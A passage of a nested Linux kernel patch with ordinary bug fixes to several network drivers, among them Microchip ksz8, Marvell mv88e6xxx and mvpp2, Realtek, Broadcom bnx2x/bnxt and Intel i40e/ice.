+ 	u8 fid;
+-	u8 member;
+-	struct alu_struct alu;
++	u8 src_port;
++	u8 mac[ETH_ALEN];
+ 
+ 	do {
+-		alu.is_static = false;
+-		ret = ksz8_r_dyn_mac_table(dev, i, alu.mac, &fid, &member,
++		ret = ksz8_r_dyn_mac_table(dev, i, mac, &fid, &src_port,
+ 					   &timestamp, &entries);
+-		if (!ret && (member & BIT(port))) {
+-			ret = cb(alu.mac, alu.fid, alu.is_static, data);
++		if (!ret && port == src_port) {
++			ret = cb(mac, fid, false, data);
+ 			if (ret)
+ 				break;
+ 		}
+diff --git a/drivers/net/dsa/microchip/ksz8863_smi.c b/drivers/net/dsa/microchip/ksz8863_smi.c
+index 2f4623f3bd852..3698112138b78 100644
+--- a/drivers/net/dsa/microchip/ksz8863_smi.c
++++ b/drivers/net/dsa/microchip/ksz8863_smi.c
+@@ -82,22 +82,16 @@ static const struct regmap_bus regmap_smi[] = {
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+-		.max_raw_read = 1,
+-		.max_raw_write = 1,
+ 	},
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+ 		.val_format_endian_default = REGMAP_ENDIAN_BIG,
+-		.max_raw_read = 2,
+-		.max_raw_write = 2,
+ 	},
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+ 		.val_format_endian_default = REGMAP_ENDIAN_BIG,
+-		.max_raw_read = 4,
+-		.max_raw_write = 4,
+ 	}
+ };
+ 
+@@ -108,7 +102,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 8,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	},
+@@ -118,7 +111,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 16,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	},
+@@ -128,7 +120,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 32,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	}
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index 19cd05762ab77..8601a9e4e4d2f 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -395,13 +395,13 @@ static const u32 ksz8863_masks[] = {
+ 	[VLAN_TABLE_VALID]		= BIT(19),
+ 	[STATIC_MAC_TABLE_VALID]	= BIT(19),
+ 	[STATIC_MAC_TABLE_USE_FID]	= BIT(21),
+-	[STATIC_MAC_TABLE_FID]		= GENMASK(29, 26),
++	[STATIC_MAC_TABLE_FID]		= GENMASK(25, 22),
+ 	[STATIC_MAC_TABLE_OVERRIDE]	= BIT(20),
+ 	[STATIC_MAC_TABLE_FWD_PORTS]	= GENMASK(18, 16),
+-	[DYNAMIC_MAC_TABLE_ENTRIES_H]	= GENMASK(5, 0),
+-	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(7),
++	[DYNAMIC_MAC_TABLE_ENTRIES_H]	= GENMASK(1, 0),
++	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(2),
+ 	[DYNAMIC_MAC_TABLE_NOT_READY]	= BIT(7),
+-	[DYNAMIC_MAC_TABLE_ENTRIES]	= GENMASK(31, 28),
++	[DYNAMIC_MAC_TABLE_ENTRIES]	= GENMASK(31, 24),
+ 	[DYNAMIC_MAC_TABLE_FID]		= GENMASK(19, 16),
+ 	[DYNAMIC_MAC_TABLE_SRC_PORT]	= GENMASK(21, 20),
+ 	[DYNAMIC_MAC_TABLE_TIMESTAMP]	= GENMASK(23, 22),
+@@ -411,10 +411,10 @@ static u8 ksz8863_shifts[] = {
+ 	[VLAN_TABLE_MEMBERSHIP_S]	= 16,
+ 	[STATIC_MAC_FWD_PORTS]		= 16,
+ 	[STATIC_MAC_FID]		= 22,
+-	[DYNAMIC_MAC_ENTRIES_H]		= 3,
++	[DYNAMIC_MAC_ENTRIES_H]		= 8,
+ 	[DYNAMIC_MAC_ENTRIES]		= 24,
+ 	[DYNAMIC_MAC_FID]		= 16,
+-	[DYNAMIC_MAC_TIMESTAMP]		= 24,
++	[DYNAMIC_MAC_TIMESTAMP]		= 22,
+ 	[DYNAMIC_MAC_SRC_PORT]		= 20,
+ };
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 89829e0ca8e8f..8211a4d373e81 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3354,9 +3354,14 @@ static int mv88e6xxx_setup_port(struct mv88e6xxx_chip *chip, int port)
+ 	 * If this is the upstream port for this switch, enable
+ 	 * forwarding of unknown unicasts and multicasts.
+ 	 */
+-	reg = MV88E6XXX_PORT_CTL0_IGMP_MLD_SNOOP |
+-		MV88E6185_PORT_CTL0_USE_TAG | MV88E6185_PORT_CTL0_USE_IP |
++	reg = MV88E6185_PORT_CTL0_USE_TAG | MV88E6185_PORT_CTL0_USE_IP |
+ 		MV88E6XXX_PORT_CTL0_STATE_FORWARDING;
++	/* Forward any IPv4 IGMP or IPv6 MLD frames received
++	 * by a USER port to the CPU port to allow snooping.
++	 */
++	if (dsa_is_user_port(ds, port))
++		reg |= MV88E6XXX_PORT_CTL0_IGMP_MLD_SNOOP;
++
+ 	err = mv88e6xxx_port_write(chip, port, MV88E6XXX_PORT_CTL0, reg);
+ 	if (err)
+ 		return err;
+diff --git a/drivers/net/dsa/realtek/realtek-mdio.c b/drivers/net/dsa/realtek/realtek-mdio.c
+index 3e54fac5f9027..5a8fe707ca25e 100644
+--- a/drivers/net/dsa/realtek/realtek-mdio.c
++++ b/drivers/net/dsa/realtek/realtek-mdio.c
+@@ -21,6 +21,7 @@
+ 
+ #include <linux/module.h>
+ #include <linux/of_device.h>
++#include <linux/overflow.h>
+ #include <linux/regmap.h>
+ 
+ #include "realtek.h"
+@@ -152,7 +153,9 @@ static int realtek_mdio_probe(struct mdio_device *mdiodev)
+ 	if (!var)
+ 		return -EINVAL;
+ 
+-	priv = devm_kzalloc(&mdiodev->dev, sizeof(*priv), GFP_KERNEL);
++	priv = devm_kzalloc(&mdiodev->dev,
++			    size_add(sizeof(*priv), var->chip_data_sz),
++			    GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+index 16c490692f422..12083b9679b54 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+@@ -672,6 +672,18 @@ static int bnx2x_fill_frag_skb(struct bnx2x *bp, struct bnx2x_fastpath *fp,
+ 	return 0;
+ }
+ 
++static struct sk_buff *
++bnx2x_build_skb(const struct bnx2x_fastpath *fp, void *data)
++{
++	struct sk_buff *skb;
++
++	if (fp->rx_frag_size)
++		skb = build_skb(data, fp->rx_frag_size);
++	else
++		skb = slab_build_skb(data);
++	return skb;
++}
++
+ static void bnx2x_frag_free(const struct bnx2x_fastpath *fp, void *data)
+ {
+ 	if (fp->rx_frag_size)
+@@ -779,7 +791,7 @@ static void bnx2x_tpa_stop(struct bnx2x *bp, struct bnx2x_fastpath *fp,
+ 	dma_unmap_single(&bp->pdev->dev, dma_unmap_addr(rx_buf, mapping),
+ 			 fp->rx_buf_size, DMA_FROM_DEVICE);
+ 	if (likely(new_data))
+-		skb = build_skb(data, fp->rx_frag_size);
++		skb = bnx2x_build_skb(fp, data);
+ 
+ 	if (likely(skb)) {
+ #ifdef BNX2X_STOP_ON_ERROR
+@@ -1046,7 +1058,7 @@ static int bnx2x_rx_int(struct bnx2x_fastpath *fp, int budget)
+ 						 dma_unmap_addr(rx_buf, mapping),
+ 						 fp->rx_buf_size,
+ 						 DMA_FROM_DEVICE);
+-				skb = build_skb(data, fp->rx_frag_size);
++				skb = bnx2x_build_skb(fp, data);
+ 				if (unlikely(!skb)) {
+ 					bnx2x_frag_free(fp, data);
+ 					bnx2x_fp_qstats(bp, fp)->
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index b44b2ec5e61a2..015b5848b9583 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -175,12 +175,12 @@ static const struct pci_device_id bnxt_pci_tbl[] = {
+ 	{ PCI_VDEVICE(BROADCOM, 0x1750), .driver_data = BCM57508 },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1751), .driver_data = BCM57504 },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1752), .driver_data = BCM57502 },
+-	{ PCI_VDEVICE(BROADCOM, 0x1800), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1800), .driver_data = BCM57502_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1801), .driver_data = BCM57504_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1802), .driver_data = BCM57502_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1803), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1802), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1803), .driver_data = BCM57502_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1804), .driver_data = BCM57504_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1805), .driver_data = BCM57502_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1805), .driver_data = BCM57508_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0xd802), .driver_data = BCM58802 },
+ 	{ PCI_VDEVICE(BROADCOM, 0xd804), .driver_data = BCM58804 },
+ #ifdef CONFIG_BNXT_SRIOV
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+index 56355e64815e2..3056e5bb7d6fa 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+@@ -1225,6 +1225,7 @@ struct bnxt_link_info {
+ #define BNXT_LINK_SPEED_40GB	PORT_PHY_QCFG_RESP_LINK_SPEED_40GB
+ #define BNXT_LINK_SPEED_50GB	PORT_PHY_QCFG_RESP_LINK_SPEED_50GB
+ #define BNXT_LINK_SPEED_100GB	PORT_PHY_QCFG_RESP_LINK_SPEED_100GB
++#define BNXT_LINK_SPEED_200GB	PORT_PHY_QCFG_RESP_LINK_SPEED_200GB
+ 	u16			support_speeds;
+ 	u16			support_pam4_speeds;
+ 	u16			auto_link_speeds;	/* fw adv setting */
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index ec573127b7076..6bd18eb5137f4 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -1714,6 +1714,8 @@ u32 bnxt_fw_to_ethtool_speed(u16 fw_link_speed)
+ 		return SPEED_50000;
+ 	case BNXT_LINK_SPEED_100GB:
+ 		return SPEED_100000;
++	case BNXT_LINK_SPEED_200GB:
++		return SPEED_200000;
+ 	default:
+ 		return SPEED_UNKNOWN;
+ 	}
+@@ -3738,6 +3740,7 @@ static void bnxt_self_test(struct net_device *dev, struct ethtool_test *etest,
+ 		bnxt_ulp_stop(bp);
+ 		rc = bnxt_close_nic(bp, true, false);
+ 		if (rc) {
++			etest->flags |= ETH_TEST_FL_FAILED;
+ 			bnxt_ulp_start(bp, rc);
+ 			return;
+ 		}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.c b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+index ef4d3762bf371..ca229b0efeb65 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+@@ -44,7 +44,7 @@ static i40e_status i40e_diag_reg_pattern_test(struct i40e_hw *hw,
+ 	return 0;
+ }
+ 
+-struct i40e_diag_reg_test_info i40e_reg_list[] = {
++const struct i40e_diag_reg_test_info i40e_reg_list[] = {
+ 	/* offset               mask         elements   stride */
+ 	{I40E_QTX_CTL(0),       0x0000FFBF, 1,
+ 		I40E_QTX_CTL(1) - I40E_QTX_CTL(0)},
+@@ -78,27 +78,28 @@ i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
+ {
+ 	i40e_status ret_code = 0;
+ 	u32 reg, mask;
++	u32 elements;
+ 	u32 i, j;
+ 
+ 	for (i = 0; i40e_reg_list[i].offset != 0 &&
+ 					     !ret_code; i++) {
+ 
++		elements = i40e_reg_list[i].elements;
+ 		/* set actual reg range for dynamically allocated resources */
+ 		if (i40e_reg_list[i].offset == I40E_QTX_CTL(0) &&
+ 		    hw->func_caps.num_tx_qp != 0)
+-			i40e_reg_list[i].elements = hw->func_caps.num_tx_qp;
++			elements = hw->func_caps.num_tx_qp;
+ 		if ((i40e_reg_list[i].offset == I40E_PFINT_ITRN(0, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_PFINT_ITRN(1, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_PFINT_ITRN(2, 0) ||
+ 		     i40e_reg_list[i].offset == I40E_QINT_TQCTL(0) ||
+ 		     i40e_reg_list[i].offset == I40E_QINT_RQCTL(0)) &&
+ 		    hw->func_caps.num_msix_vectors != 0)
+-			i40e_reg_list[i].elements =
+-				hw->func_caps.num_msix_vectors - 1;
++			elements = hw->func_caps.num_msix_vectors - 1;
+ 
+ 		/* test register access */
+ 		mask = i40e_reg_list[i].mask;
+-		for (j = 0; j < i40e_reg_list[i].elements && !ret_code; j++) {
++		for (j = 0; j < elements && !ret_code; j++) {
+ 			reg = i40e_reg_list[i].offset +
+ 			      (j * i40e_reg_list[i].stride);
+ 			ret_code = i40e_diag_reg_pattern_test(hw, reg, mask);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.h b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+index c3340f320a18c..1db7c6d572311 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+@@ -20,7 +20,7 @@ struct i40e_diag_reg_test_info {
+ 	u32 stride;	/* bytes between each element */
+ };
+ 
+-extern struct i40e_diag_reg_test_info i40e_reg_list[];
++extern const struct i40e_diag_reg_test_info i40e_reg_list[];
+ 
+ i40e_status i40e_diag_reg_test(struct i40e_hw *hw);
+ i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw);
+diff --git a/drivers/net/ethernet/intel/ice/ice_sched.c b/drivers/net/ethernet/intel/ice/ice_sched.c
+index 6d08b397df2ad..8f0ea411dfba0 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sched.c
++++ b/drivers/net/ethernet/intel/ice/ice_sched.c
+@@ -2787,7 +2787,7 @@ static int
+ ice_sched_assoc_vsi_to_agg(struct ice_port_info *pi, u32 agg_id,
+ 			   u16 vsi_handle, unsigned long *tc_bitmap)
+ {
+-	struct ice_sched_agg_vsi_info *agg_vsi_info, *old_agg_vsi_info = NULL;
++	struct ice_sched_agg_vsi_info *agg_vsi_info, *iter, *old_agg_vsi_info = NULL;
+ 	struct ice_sched_agg_info *agg_info, *old_agg_info;
+ 	struct ice_hw *hw = pi->hw;
+ 	int status = 0;
+@@ -2805,11 +2805,13 @@ ice_sched_assoc_vsi_to_agg(struct ice_port_info *pi, u32 agg_id,
+ 	if (old_agg_info && old_agg_info != agg_info) {
+ 		struct ice_sched_agg_vsi_info *vtmp;
+ 
+-		list_for_each_entry_safe(old_agg_vsi_info, vtmp,
++		list_for_each_entry_safe(iter, vtmp,
+ 					 &old_agg_info->agg_vsi_list,
+ 					 list_entry)
+-			if (old_agg_vsi_info->vsi_handle == vsi_handle)
++			if (iter->vsi_handle == vsi_handle) {
++				old_agg_vsi_info = iter;
+ 				break;
++			}
+ 	}
+ 
+ 	/* check if entry already exist */
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 61f844d225123..46b36851af460 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -1780,18 +1780,36 @@ ice_update_vsi(struct ice_hw *hw, u16 vsi_handle, struct ice_vsi_ctx *vsi_ctx,
+ int
+ ice_cfg_rdma_fltr(struct ice_hw *hw, u16 vsi_handle, bool enable)
+ {
+-	struct ice_vsi_ctx *ctx;
++	struct ice_vsi_ctx *ctx, *cached_ctx;
++	int status;
++
++	cached_ctx = ice_get_vsi_ctx(hw, vsi_handle);
++	if (!cached_ctx)
++		return -ENOENT;
+ 
+-	ctx = ice_get_vsi_ctx(hw, vsi_handle);
++	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 	if (!ctx)
+-		return -EIO;
++		return -ENOMEM;
++
++	ctx->info.q_opt_rss = cached_ctx->info.q_opt_rss;
++	ctx->info.q_opt_tc = cached_ctx->info.q_opt_tc;
++	ctx->info.q_opt_flags = cached_ctx->info.q_opt_flags;
++
++	ctx->info.valid_sections = cpu_to_le16(ICE_AQ_VSI_PROP_Q_OPT_VALID);
+ 
+ 	if (enable)
+ 		ctx->info.q_opt_flags |= ICE_AQ_VSI_Q_OPT_PE_FLTR_EN;
+ 	else
+ 		ctx->info.q_opt_flags &= ~ICE_AQ_VSI_Q_OPT_PE_FLTR_EN;
+ 
+-	return ice_update_vsi(hw, vsi_handle, ctx, NULL);
++	status = ice_update_vsi(hw, vsi_handle, ctx, NULL);
++	if (!status) {
++		cached_ctx->info.q_opt_flags = ctx->info.q_opt_flags;
++		cached_ctx->info.valid_sections |= ctx->info.valid_sections;
++	}
++
++	kfree(ctx);
++	return status;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index c6a58343d81d8..a2645ff3100e4 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -541,6 +541,72 @@ static void ice_vc_fdir_rem_prof_all(struct ice_vf *vf)
+ 	}
+ }
+ 
++/**
++ * ice_vc_fdir_has_prof_conflict
++ * @vf: pointer to the VF structure
++ * @conf: FDIR configuration for each filter
++ *
++ * Check if @conf has conflicting profile with existing profiles
++ *
++ * Return: true on success, and false on error.
++ */
++static bool
++ice_vc_fdir_has_prof_conflict(struct ice_vf *vf,
++			      struct virtchnl_fdir_fltr_conf *conf)
++{
++	struct ice_fdir_fltr *desc;
++
++	list_for_each_entry(desc, &vf->fdir.fdir_rule_list, fltr_node) {
++		struct virtchnl_fdir_fltr_conf *existing_conf;
++		enum ice_fltr_ptype flow_type_a, flow_type_b;
++		struct ice_fdir_fltr *a, *b;
++
++		existing_conf = to_fltr_conf_from_desc(desc);
++		a = &existing_conf->input;
++		b = &conf->input;
++		flow_type_a = a->flow_type;
++		flow_type_b = b->flow_type;
++
++		/* No need to compare two rules with different tunnel types or
++		 * with the same protocol type.
++		 */
++		if (existing_conf->ttype != conf->ttype ||
++		    flow_type_a == flow_type_b)
++			continue;
++
++		switch (flow_type_a) {
++		case ICE_FLTR_PTYPE_NONF_IPV4_UDP:
++		case ICE_FLTR_PTYPE_NONF_IPV4_TCP:
++		case ICE_FLTR_PTYPE_NONF_IPV4_SCTP:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_OTHER)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV4_OTHER:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_UDP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_TCP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV4_SCTP)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV6_UDP:
++		case ICE_FLTR_PTYPE_NONF_IPV6_TCP:
++		case ICE_FLTR_PTYPE_NONF_IPV6_SCTP:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_OTHER)
++				return true;
++			break;
++		case ICE_FLTR_PTYPE_NONF_IPV6_OTHER:
++			if (flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_UDP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_TCP ||
++			    flow_type_b == ICE_FLTR_PTYPE_NONF_IPV6_SCTP)
++				return true;
++			break;
++		default:
++			break;
++		}
++	}
++
++	return false;
++}
++
+ /**
+  * ice_vc_fdir_write_flow_prof
+  * @vf: pointer to the VF structure
+@@ -677,6 +743,13 @@ ice_vc_fdir_config_input_set(struct ice_vf *vf, struct virtchnl_fdir_add *fltr,
+ 	enum ice_fltr_ptype flow;
+ 	int ret;
+ 
++	ret = ice_vc_fdir_has_prof_conflict(vf, conf);
++	if (ret) {
++		dev_dbg(dev, "Found flow profile conflict for VF %d\n",
++			vf->vf_id);
++		return ret;
++	}
++
+ 	flow = input->flow_type;
+ 	ret = ice_vc_fdir_alloc_prof(vf, flow);
+ 	if (ret) {
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
+index 41d935d1aaf6f..40aeaa7bd739f 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c
+@@ -62,35 +62,38 @@ static const struct mvpp2_cls_flow cls_flows[MVPP2_N_PRS_FLOWS] = {
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4 |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OPT |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OTHER |
+-		       MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	/* TCP over IPv4 flows, fragmented, with vlan tag */
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	/* UDP over IPv4 flows, Not fragmented, no vlan tag */
+@@ -132,35 +135,38 @@ static const struct mvpp2_cls_flow cls_flows[MVPP2_N_PRS_FLOWS] = {
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4 |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OPT |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OTHER |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	/* UDP over IPv4 flows, fragmented, with vlan tag */
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	/* TCP over IPv6 flows, not fragmented, no vlan tag */
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
+index 75ba57bd1d46d..9af22f497a40f 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
+@@ -1539,8 +1539,8 @@ static int mvpp2_prs_vlan_init(struct platform_device *pdev, struct mvpp2 *priv)
+ 	if (!priv->prs_double_vlans)
+ 		return -ENOMEM;
+ 
+-	/* Double VLAN: 0x8100, 0x88A8 */
